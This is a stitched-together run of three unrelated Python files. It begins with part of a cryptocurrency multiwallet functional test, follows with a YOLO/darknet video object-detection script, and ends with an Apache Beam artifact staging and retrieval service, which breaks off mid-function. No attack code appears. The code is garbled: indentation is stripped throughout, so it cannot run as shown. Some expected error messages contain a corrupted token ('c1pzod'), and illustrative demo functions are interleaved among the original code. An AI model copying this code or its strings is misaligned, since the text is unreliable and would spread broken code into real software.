self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)
# should not initialize if the specified walletdir does not exist
self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
# should not initialize if the specified walletdir is not a directory
not_a_dir = wallet_dir('notadir')
open(not_a_dir, 'a', encoding="utf8").close()
self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')
self.log.info("Do not allow -upgradewallet with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")
# if wallets/ doesn't exist, datadir should be the default wallet dir
wallet_dir2 = data_dir('walletdir')
os.rename(wallet_dir(), wallet_dir2)
self.start_node(0)
self.nodes[0].createwallet("w4")
self.nodes[0].createwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
node.generatetoaddress(nblocks=1, address=w5.getnewaddress())
# now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
os.rename(wallet_dir2, wallet_dir())
self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
self.nodes[0].loadwallet("w4")
self.nodes[0].loadwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5_info = w5.getwalletinfo()
assert_equal(w5_info['immature_balance'], 50)
competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
os.mkdir(competing_wallet_dir)
self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
self.nodes[0].createwallet(self.default_wallet_name)
if self.options.descriptors:
exp_stderr = r"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another c1pzod?"
else:
exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.restart_node(0)
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
wallets = [wallet(w) for w in wallet_names]
wallet_bad = wallet("bad")
# check wallet names and balances
node.generatetoaddress(nblocks=1, address=wallets[0].getnewaddress())
for wallet_name, wallet in zip(wallet_names, wallets):
info = wallet.getwalletinfo()
assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
assert_equal(info['walletname'], wallet_name)
# accessing invalid wallet fails
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)
# accessing wallet RPC without using wallet endpoint fails
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w1, w2, w3, w4, *_ = wallets
node.generatetoaddress(nblocks=101, address=w1.getnewaddress())
assert_equal(w1.getbalance(), 100)
assert_equal(w2.getbalance(), 0)
assert_equal(w3.getbalance(), 0)
assert_equal(w4.getbalance(), 0)
w1.sendtoaddress(w2.getnewaddress(), 1)
w1.sendtoaddress(w3.getnewaddress(), 2)
w1.sendtoaddress(w4.getnewaddress(), 3)
node.generatetoaddress(nblocks=1, address=w1.getnewaddress())
assert_equal(w2.getbalance(), 1)
assert_equal(w3.getbalance(), 2)
assert_equal(w4.getbalance(), 3)
batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
assert_equal(batch[0]["result"]["chain"], self.chain)
assert_equal(batch[1]["result"]["walletname"], "w1")
self.log.info('Check for per-wallet settxfee call')
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 0)
w2.settxfee(0.001)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))
self.log.info("Test dynamic wallet loading")
self.restart_node(0, ['-nowallet'])
assert_equal(node.listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)
self.log.info("Load first wallet")
loadwallet_name = node.loadwallet(wallet_names[0])
assert_equal(loadwallet_name['name'], wallet_names[0])
assert_equal(node.listwallets(), wallet_names[0:1])
node.getwalletinfo()
w1 = node.get_wallet_rpc(wallet_names[0])
w1.getwalletinfo()
self.log.info("Load second wallet")
loadwallet_name = node.loadwallet(wallet_names[1])
assert_equal(loadwallet_name['name'], wallet_names[1])
assert_equal(node.listwallets(), wallet_names[0:2])
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w2 = node.get_wallet_rpc(wallet_names[1])
w2.getwalletinfo()
self.log.info("Concurrent wallet loading")
threads = []
for _ in range(3):
n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
t = Thread(target=test_load_unload, args=(n, wallet_names[2]))
t.start()
threads.append(t)
for t in threads:
t.join()
global got_loading_error
assert_equal(got_loading_error, True)
self.log.info("Load remaining wallets")
for wallet_name in wallet_names[2:]:
loadwallet_name = self.nodes[0].loadwallet(wallet_name)
assert_equal(loadwallet_name['name'], wallet_name)
assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))
# Fail to load if wallet doesn't exist
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')
# Fail to load duplicate wallets
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
if self.options.descriptors:
assert_raises_rpc_error(-4, "Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another c1pzod?", self.nodes[0].loadwallet, wallet_names[0])
else:
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])
# This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
# Fail to load duplicate wallets by different ways (directory and filepath)
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')
# Only BDB refuses to open duplicate wallet files; SQLite does not have this limitation. While that may be desirable in the future, it is not necessary.
# Fail to load if one wallet is a copy of another
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if wallet file is a symlink
assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')
# Fail to load if a directory is specified that doesn't contain a wallet
os.mkdir(wallet_dir('empty_wallet_dir'))
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')
self.log.info("Test dynamic wallet creation.")
# Fail to create a wallet if it already exists.
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')
# Successfully create a wallet with a new name
loadwallet_name = self.nodes[0].createwallet('w9')
in_wallet_dir.append('w9')
assert_equal(loadwallet_name['name'], 'w9')
w9 = node.get_wallet_rpc('w9')
assert_equal(w9.getwalletinfo()['walletname'], 'w9')
assert 'w9' in self.nodes[0].listwallets()
# Successfully create a wallet using a full path
new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
new_wallet_name = os.path.join(new_wallet_dir, 'w10')
loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
assert_equal(loadwallet_name['name'], new_wallet_name)
w10 = node.get_wallet_rpc(new_wallet_name)
assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
assert new_wallet_name in self.nodes[0].listwallets()
self.log.info("Test dynamic wallet unloading")
# Test `unloadwallet` errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
assert_raises_rpc_error(-8, "RPC endpoint wallet and wallet_name parameter specify different wallets", w1.unloadwallet, "w2"),
# Successfully unload the specified wallet name
self.nodes[0].unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Unload w1 again, this time providing the wallet name twice
self.nodes[0].loadwallet("w1")
assert 'w1' in self.nodes[0].listwallets()
w1.unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Successfully unload the wallet referenced by the request endpoint
# Also ensure unload works during walletpassphrase timeout
w2.encryptwallet('test')
w2.walletpassphrase('test', 1)
w2.unloadwallet()
time.sleep(1.1)
assert 'w2' not in self.nodes[0].listwallets()
# Successfully unload all wallets
for wallet_name in self.nodes[0].listwallets():
self.nodes[0].unloadwallet(wallet_name)
assert_equal(self.nodes[0].listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)
# Successfully load a previously unloaded wallet
self.nodes[0].loadwallet('w1')
assert_equal(self.nodes[0].listwallets(), ['w1'])
assert_equal(w1.getwalletinfo()['walletname'], 'w1')
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
# Test backing up and restoring wallets
self.log.info("Test wallet backup")
self.restart_node(0, ['-nowallet'])
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
for wallet_name in wallet_names:
rpc = self.nodes[0].get_wallet_rpc(wallet_name)
addr = rpc.getnewaddress()
backup = os.path.join(self.options.tmpdir, 'backup.dat')
if os.path.exists(backup):
os.unlink(backup)
rpc.backupwallet(backup)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(backup, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], True)
# Test .walletlock file is closed
self.start_node(1)
wallet = os.path.join(self.options.tmpdir, 'my_wallet')
self.nodes[0].createwallet(wallet)
if self.options.descriptors:
assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
else:
assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
self.nodes[0].unloadwallet(wallet)
self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
MultiWalletTest().main()
|
darknet_video.py
|
from ctypes import *
import random
import os
import cv2
import time
import darknet
import argparse
from threading import Thread, enumerate
from queue import Queue
def parser():
parser = argparse.ArgumentParser(description="YOLO Object Detection")
parser.add_argument("--input", type=str, default=0,
help="video source. If empty, uses webcam 0 stream")
parser.add_argument("--out_filename", type=str, default="",
help="inference video name. Not saved if empty")
parser.add_argument("--weights", default="yolov4.weights",
help="yolo weights path")
parser.add_argument("--dont_show", action='store_true',
help="windown inference display. For headless systems")
parser.add_argument("--ext_output", action='store_true',
help="display bbox coordinates of detected objects")
parser.add_argument("--config_file", default="./cfg/yolov4.cfg",
help="path to config file")
parser.add_argument("--data_file", default="./cfg/coco.data",
help="path to data file")
parser.add_argument("--thresh", type=float, default=.25,
help="remove detections with confidence below this value")
return parser.parse_args()
def str2int(video_path):
"""
argparse returns a string although the webcam index is an int (0, 1, ...).
Cast to int if possible.
"""
try:
return int(video_path)
except ValueError:
return video_path
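# --- Example (illustrative only): str2int behavior. ---
def _demo_str2int():
    assert str2int("0") == 0                    # webcam index for VideoCapture
    assert str2int("video.mp4") == "video.mp4"  # file paths stay strings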
def check_arguments_errors(args):
assert 0 < args.thresh < 1, "Threshold should be a float between zero and one (non-inclusive)"
if not os.path.exists(args.config_file):
raise(ValueError("Invalid config path {}".format(os.path.abspath(args.config_file))))
if not os.path.exists(args.weights):
raise(ValueError("Invalid weight path {}".format(os.path.abspath(args.weights))))
if not os.path.exists(args.data_file):
raise(ValueError("Invalid data file path {}".format(os.path.abspath(args.data_file))))
if isinstance(str2int(args.input), str) and not os.path.exists(args.input):
raise(ValueError("Invalid video path {}".format(os.path.abspath(args.input))))
def set_saved_video(input_video, output_video, size):
fourcc = cv2.VideoWriter_fourcc(*"MJPG")
fps = int(input_video.get(cv2.CAP_PROP_FPS))
video = cv2.VideoWriter(output_video, fourcc, fps, size)
return video
def video_capture(frame_queue, darknet_image_queue):
while cap.isOpened():
ret, frame = cap.read()
if not ret:
break
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (width, height),
interpolation=cv2.INTER_LINEAR)
frame_queue.put(frame_resized)
darknet.copy_image_from_bytes(darknet_image, frame_resized.tobytes())
darknet_image_queue.put(darknet_image)
cap.release()
def inference(darknet_image_queue, detections_queue, fps_queue):
while cap.isOpened():
darknet_image = darknet_image_queue.get()
prev_time = time.time()
detections = darknet.detect_image(network, class_names, darknet_image, thresh=args.thresh)
detections_queue.put(detections)
fps = int(1/(time.time() - prev_time))
fps_queue.put(fps)
print("FPS: {}".format(fps))
darknet.print_detections(detections, args.ext_output)
cap.release()
def drawing(frame_queue, detections_queue, fps_queue):
random.seed(3) # deterministic bbox colors
video = set_saved_video(cap, args.out_filename, (width, height))
while cap.isOpened():
frame_resized = frame_queue.get()
detections = detections_queue.get()
fps = fps_queue.get()
if frame_resized is not None:
image = darknet.draw_boxes(detections, frame_resized, class_colors)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
if args.out_filename is not None:
video.write(image)
if not args.dont_show:
cv2.imshow('Inference', image)
if cv2.waitKey(fps) == 27:
break
cap.release()
video.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
frame_queue = Queue()
darknet_image_queue = Queue(maxsize=1)
detections_queue = Queue(maxsize=1)
fps_queue = Queue(maxsize=1)
args = parser()
check_arguments_errors(args)
network, class_names, class_colors = darknet.load_network(
args.config_file,
args.data_file,
args.weights,
batch_size=1
)
# Darknet doesn't accept numpy images.
# Create a darknet image once and reuse it for every detection.
width = darknet.network_width(network)
height = darknet.network_height(network)
darknet_image = darknet.make_image(width, height, 3)
input_path = str2int(args.input)
cap = cv2.VideoCapture(input_path)
Thread(target=video_capture, args=(frame_queue, darknet_image_queue)).start()
Thread(target=inference, args=(darknet_image_queue, detections_queue, fps_queue)).start()
Thread(target=drawing, args=(frame_queue, detections_queue, fps_queue)).start()
|
artifact_service.py
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Implementation of an Artifact{Staging,Retrieval}Service.
The staging service here can be backed by any beam filesystem.
"""
# pytype: skip-file
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import concurrent.futures
import contextlib
import hashlib
import os
import queue
import sys
import threading
import typing
import zipfile
from io import BytesIO
from typing import Callable
from typing import Iterator
from future.moves.urllib.request import urlopen
from google.protobuf import json_format
from apache_beam.io import filesystems
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_artifact_api_pb2
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.utils import proto_utils
if typing.TYPE_CHECKING:
from typing import BinaryIO # pylint: disable=ungrouped-imports
# The legacy artifact staging and retrieval services.
class AbstractArtifactService(
beam_artifact_api_pb2_grpc.LegacyArtifactStagingServiceServicer,
beam_artifact_api_pb2_grpc.LegacyArtifactRetrievalServiceServicer):
_DEFAULT_CHUNK_SIZE = 2 << 20  # 2 MiB
def __init__(self, root, chunk_size=None):
self._root = root
self._chunk_size = chunk_size or self._DEFAULT_CHUNK_SIZE
def _sha256(self, string):
return hashlib.sha256(string.encode('utf-8')).hexdigest()
def _join(self, *args):
# type: (*str) -> str
raise NotImplementedError(type(self))
def _dirname(self, path):
# type: (str) -> str
raise NotImplementedError(type(self))
def _temp_path(self, path):
# type: (str) -> str
return path + '.tmp'
def _open(self, path, mode):
raise NotImplementedError(type(self))
def _rename(self, src, dest):
# type: (str, str) -> None
raise NotImplementedError(type(self))
def _delete(self, path):
# type: (str) -> None
raise NotImplementedError(type(self))
def _artifact_path(self, retrieval_token, name):
# type: (str, str) -> str
return self._join(self._dirname(retrieval_token), self._sha256(name))
def _manifest_path(self, retrieval_token):
# type: (str) -> str
return retrieval_token
def _get_manifest_proxy(self, retrieval_token):
# type: (str) -> beam_artifact_api_pb2.ProxyManifest
with self._open(self._manifest_path(retrieval_token), 'r') as fin:
return json_format.Parse(
fin.read().decode('utf-8'), beam_artifact_api_pb2.ProxyManifest())
def retrieval_token(self, staging_session_token):
# type: (str) -> str
return self._join(
self._root, self._sha256(staging_session_token), 'MANIFEST')
def PutArtifact(self, request_iterator, context=None):
# type: (...) -> beam_artifact_api_pb2.PutArtifactResponse
first = True
for request in request_iterator:
if first:
first = False
metadata = request.metadata.metadata
retrieval_token = self.retrieval_token(
request.metadata.staging_session_token)
artifact_path = self._artifact_path(retrieval_token, metadata.name)
temp_path = self._temp_path(artifact_path)
fout = self._open(temp_path, 'w')
hasher = hashlib.sha256()
else:
hasher.update(request.data.data)
fout.write(request.data.data)
fout.close()
data_hash = hasher.hexdigest()
if metadata.sha256 and metadata.sha256 != data_hash:
self._delete(temp_path)
raise ValueError(
'Bad metadata hash: %s vs %s' % (metadata.sha256, data_hash))
self._rename(temp_path, artifact_path)
return beam_artifact_api_pb2.PutArtifactResponse()
def CommitManifest(self,
request, # type: beam_artifact_api_pb2.CommitManifestRequest
context=None):
# type: (...) -> beam_artifact_api_pb2.CommitManifestResponse
retrieval_token = self.retrieval_token(request.staging_session_token)
proxy_manifest = beam_artifact_api_pb2.ProxyManifest(
manifest=request.manifest,
location=[
beam_artifact_api_pb2.ProxyManifest.Location(
name=metadata.name,
uri=self._artifact_path(retrieval_token, metadata.name))
for metadata in request.manifest.artifact
])
with self._open(self._manifest_path(retrieval_token), 'w') as fout:
fout.write(json_format.MessageToJson(proxy_manifest).encode('utf-8'))
return beam_artifact_api_pb2.CommitManifestResponse(
retrieval_token=retrieval_token)
def GetManifest(self,
request, # type: beam_artifact_api_pb2.GetManifestRequest
context=None):
# type: (...) -> beam_artifact_api_pb2.GetManifestResponse
return beam_artifact_api_pb2.GetManifestResponse(
manifest=self._get_manifest_proxy(request.retrieval_token).manifest)
def GetArtifact(self,
request, # type: beam_artifact_api_pb2.LegacyGetArtifactRequest
context=None):
# type: (...) -> Iterator[beam_artifact_api_pb2.ArtifactChunk]
for artifact in self._get_manifest_proxy(request.retrieval_token).location:
if artifact.name == request.name:
with self._open(artifact.uri, 'r') as fin:
# This value is not emitted, but lets us yield a single empty
# chunk on an empty file.
chunk = b'1'
while chunk:
chunk = fin.read(self._chunk_size)
yield beam_artifact_api_pb2.ArtifactChunk(data=chunk)
break
else:
raise ValueError('Unknown artifact: %s' % request.name)
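# --- Example (illustrative only): the storage layout implied above. ---
# With root '/staging' and staging session token 'job-1', the manifest is
# written to <root>/<sha256('job-1')>/MANIFEST and each artifact to
# <root>/<sha256('job-1')>/<sha256(artifact_name)>. A hypothetical sketch
# using the filesystem-backed subclass defined below:
def _demo_artifact_layout():
    svc = BeamFilesystemArtifactService('/staging')
    token = svc.retrieval_token('job-1')         # .../<sha>/MANIFEST
    return svc._artifact_path(token, 'dep.jar')  # .../<sha>/<sha('dep.jar')>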
class ZipFileArtifactService(AbstractArtifactService):
"""Stores artifacts in a zip file.
This is particularly useful for storing artifacts as part of an UberJar for
submitting to an upstream runner's cluster.
Writing to zip files requires Python 3.6+.
"""
def __init__(self, path, internal_root, chunk_size=None):
if sys.version_info < (3, 6):
raise RuntimeError(
'Writing to zip files requires Python 3.6+, '
'but current version is %s' % sys.version)
super(ZipFileArtifactService, self).__init__(internal_root, chunk_size)
self._zipfile = zipfile.ZipFile(path, 'a')
self._lock = threading.Lock()
def _join(self, *args):
# type: (*str) -> str
return '/'.join(args)
def _dirname(self, path):
# type: (str) -> str
return path.rsplit('/', 1)[0]
def _temp_path(self, path):
# type: (str) -> str
return path # ZipFile offers no move operation.
def _rename(self, src, dest):
# type: (str, str) -> None
assert src == dest
def _delete(self, path):
# type: (str) -> None
# ZipFile offers no delete operation: https://bugs.python.org/issue6818
pass
def _open(self, path, mode):
if path.startswith('/'):
raise ValueError(
'ZIP file entry %s invalid: '
'path must not contain a leading slash.' % path)
return self._zipfile.open(path, mode, force_zip64=True)
def PutArtifact(self, request_iterator, context=None):
# ZipFile only supports one writable channel at a time.
with self._lock:
return super(ZipFileArtifactService,
self).PutArtifact(request_iterator, context)
def CommitManifest(self, request, context=None):
# ZipFile only supports one writable channel at a time.
with self._lock:
return super(ZipFileArtifactService,
self).CommitManifest(request, context)
def GetManifest(self, request, context=None):
# ZipFile appears not to be thread-safe on some platforms.
with self._lock:
return super(ZipFileArtifactService, self).GetManifest(request, context)
def GetArtifact(self, request, context=None):
# ZipFile appears not to be thread-safe on some platforms.
with self._lock:
for chunk in super(ZipFileArtifactService, self).GetArtifact(request,
context):
yield chunk
def close(self):
self._zipfile.close()
class BeamFilesystemArtifactService(AbstractArtifactService):
def _join(self, *args):
# type: (*str) -> str
return filesystems.FileSystems.join(*args)
def _dirname(self, path):
# type: (str) -> str
return filesystems.FileSystems.split(path)[0]
def _rename(self, src, dest):
# type: (str, str) -> None
filesystems.FileSystems.rename([src], [dest])
def _delete(self, path):
# type: (str) -> None
filesystems.FileSystems.delete([path])
def _open(self, path, mode='r'):
dir = self._dirname(path)
if not filesystems.FileSystems.exists(dir):
      try:
        filesystems.FileSystems.mkdirs(dir)
      except Exception:
        # The directory may already exist or have been created concurrently;
        # any real failure will surface when the file itself is opened below.
        pass
if 'w' in mode:
return filesystems.FileSystems.create(path)
else:
return filesystems.FileSystems.open(path)
# The dependency-aware artifact staging and retrieval services.
class _QueueIter(object):
_END = object()
def __init__(self):
self._queue = queue.Queue()
def put(self, item):
self._queue.put(item)
def done(self):
self._queue.put(self._END)
self._queue.put(StopIteration)
def abort(self, exn=None):
if exn is None:
exn = sys.exc_info()[1]
self._queue.put(self._END)
self._queue.put(exn)
def __iter__(self):
return self
def __next__(self):
item = self._queue.get()
if item is self._END:
raise self._queue.get()
else:
return item
if sys.version_info < (3, ):
next = __next__
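# Illustrative sketch of how _QueueIter bridges a producer thread and a
# consumer iterator: put() feeds items, done() ends iteration cleanly, and
# abort() re-raises the producer's exception in the consumer. Names here are
# examples only.
def _queue_iter_sketch():
  import threading
  items = _QueueIter()

  def produce():
    try:
      for i in range(3):
        items.put(i)
      items.done()
    except:  # pylint: disable=bare-except
      items.abort()  # the consumer's next() re-raises this exception
      raise

  t = threading.Thread(target=produce)
  t.daemon = True
  t.start()
  return list(items)  # blocks until done(); yields [0, 1, 2]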
class ArtifactRetrievalService(
beam_artifact_api_pb2_grpc.ArtifactRetrievalServiceServicer):
_DEFAULT_CHUNK_SIZE = 2 << 20
def __init__(
self,
      file_reader,  # type: Callable[[str], BinaryIO]
chunk_size=None,
):
self._file_reader = file_reader
self._chunk_size = chunk_size or self._DEFAULT_CHUNK_SIZE
def ResolveArtifact(self, request, context=None):
return beam_artifact_api_pb2.ResolveArtifactResponse(
replacements=request.artifacts)
def GetArtifact(self, request, context=None):
if request.artifact.type_urn == common_urns.artifact_types.FILE.urn:
payload = proto_utils.parse_Bytes(
request.artifact.type_payload,
beam_runner_api_pb2.ArtifactFilePayload)
read_handle = self._file_reader(payload.path)
elif request.artifact.type_urn == common_urns.artifact_types.URL.urn:
payload = proto_utils.parse_Bytes(
request.artifact.type_payload, beam_runner_api_pb2.ArtifactUrlPayload)
# TODO(Py3): Remove the unneeded contextlib wrapper.
read_handle = contextlib.closing(urlopen(payload.url))
elif request.artifact.type_urn == common_urns.artifact_types.EMBEDDED.urn:
payload = proto_utils.parse_Bytes(
request.artifact.type_payload,
beam_runner_api_pb2.EmbeddedFilePayload)
read_handle = BytesIO(payload.data)
else:
raise NotImplementedError(request.artifact.type_urn)
with read_handle as fin:
while True:
chunk = fin.read(self._chunk_size)
if not chunk:
break
yield beam_artifact_api_pb2.GetArtifactResponse(data=chunk)
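# Sketch of the chunked-streaming pattern GetArtifact applies to every handle
# type above: read fixed-size blocks until EOF and yield each one
# (2 << 20 bytes == 2 MiB, matching _DEFAULT_CHUNK_SIZE).
def _iter_chunks_sketch(fin, chunk_size=2 << 20):
  while True:
    chunk = fin.read(chunk_size)
    if not chunk:
      break
    yield chunk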
class ArtifactStagingService(
beam_artifact_api_pb2_grpc.ArtifactStagingServiceServicer):
def __init__(
self,
file_writer, # type: Callable[[str, Optional[str]], Tuple[BinaryIO, str]]
):
self._lock = threading.Lock()
self._jobs_to_stage = {}
self._file_writer = file_writer
def register_job(self, staging_token, dependencies):
if staging_token in self._jobs_to_stage:
raise ValueError('Already staging %s' % staging_token)
with self._lock:
self._jobs_to_stage[staging_token] = list(dependencies), threading.Event()
def resolved_deps(self, staging_token, timeout=None):
with self._lock:
dependencies_list, event = self._jobs_to_stage[staging_token]
try:
if not event.wait(timeout):
raise concurrent.futures.TimeoutError()
return dependencies_list
finally:
with self._lock:
del self._jobs_to_stage[staging_token]
def ReverseArtifactRetrievalService(self, responses, context=None):
staging_token = next(responses).staging_token
with self._lock:
dependencies, event = self._jobs_to_stage[staging_token]
requests = _QueueIter()
class ForwardingRetrievalService(object):
def ResolveArtifacts(self, request):
requests.put(
beam_artifact_api_pb2.ArtifactRequestWrapper(
resolve_artifact=request))
return next(responses).resolve_artifact_response
def GetArtifact(self, request):
requests.put(
beam_artifact_api_pb2.ArtifactRequestWrapper(get_artifact=request))
while True:
response = next(responses)
yield response.get_artifact_response
if response.is_last:
break
def resolve():
try:
file_deps = resolve_as_files(
ForwardingRetrievalService(),
lambda name: self._file_writer(os.path.join(staging_token, name)),
dependencies)
        dependencies[:] = file_deps  # update in place so resolved_deps() sees the staged files
requests.done()
except: # pylint: disable=bare-except
requests.abort()
raise
finally:
event.set()
t = threading.Thread(target=resolve)
t.daemon = True
t.start()
return requests
def resolve_as_files(retrieval_service, file_writer, dependencies):
"""Translates a set of dependencies into file-based dependencies."""
# Resolve until nothing changes. This ensures that they can be fetched.
resolution = retrieval_service.ResolveArtifacts(
beam_artifact_api_pb2.ResolveArtifactRequest(
artifacts=dependencies,
# Anything fetchable will do.
# TODO(robertwb): Take advantage of shared filesystems, urls.
preferred_urns=[],
))
dependencies = resolution.replacements
# Fetch each of the dependencies, using file_writer to store them as
# file-based artifacts.
# TODO(robertwb): Consider parallelizing the actual writes.
for dep in dependencies:
if dep.role_urn == common_urns.artifact_roles.STAGING_TO.urn:
base_name = os.path.basename(
proto_utils.parse_Bytes(
dep.role_payload,
beam_runner_api_pb2.ArtifactStagingToRolePayload).staged_name)
else:
base_name = None
unique_name = '-'.join(
filter(
None,
[hashlib.sha256(dep.SerializeToString()).hexdigest(), base_name]))
file_handle, path = file_writer(unique_name)
with file_handle as fout:
for chunk in retrieval_service.GetArtifact(
beam_artifact_api_pb2.GetArtifactRequest(artifact=dep)):
fout.write(chunk.data)
yield beam_runner_api_pb2.ArtifactInformation(
type_urn=common_urns.artifact_types.FILE.urn,
type_payload=beam_runner_api_pb2.ArtifactFilePayload(
path=path).SerializeToString(),
role_urn=dep.role_urn,
role_payload=dep.role_payload)
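# Sketch of the content-addressed naming used above: hashing the artifact
# proto's serialized bytes means identical dependencies map to the same
# staged file name. 'dep.jar' below is a stand-in staged name.
def _unique_name_sketch(serialized_artifact, staged_name=None):
  import hashlib
  digest = hashlib.sha256(serialized_artifact).hexdigest()
  # e.g. _unique_name_sketch(b'payload', 'dep.jar') -> '<sha256hex>-dep.jar'
  return '-'.join(filter(None, [digest, staged_name]))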
def offer_artifacts(
artifact_staging_service, artifact_retrieval_service, staging_token):
"""Offers a set of artifacts to an artifact staging service, via the
ReverseArtifactRetrievalService API.
The given artifact_retrieval_service should be able to resolve/get all
artifacts relevant to this job.
"""
responses = _QueueIter()
responses.put(
beam_artifact_api_pb2.ArtifactResponseWrapper(
staging_token=staging_token))
requests = artifact_staging_service.ReverseArtifactRetrievalService(responses)
try:
for request in requests:
if request.HasField('resolve_artifact'):
responses.put(
beam_artifact_api_pb2.ArtifactResponseWrapper(
resolve_artifact_response=artifact_retrieval_service.
ResolveArtifact(request.resolve_artifact)))
elif request.HasField('get_artifact'):
for chunk in artifact_retrieval_service.GetArtifact(
request.get_artifact):
responses.put(
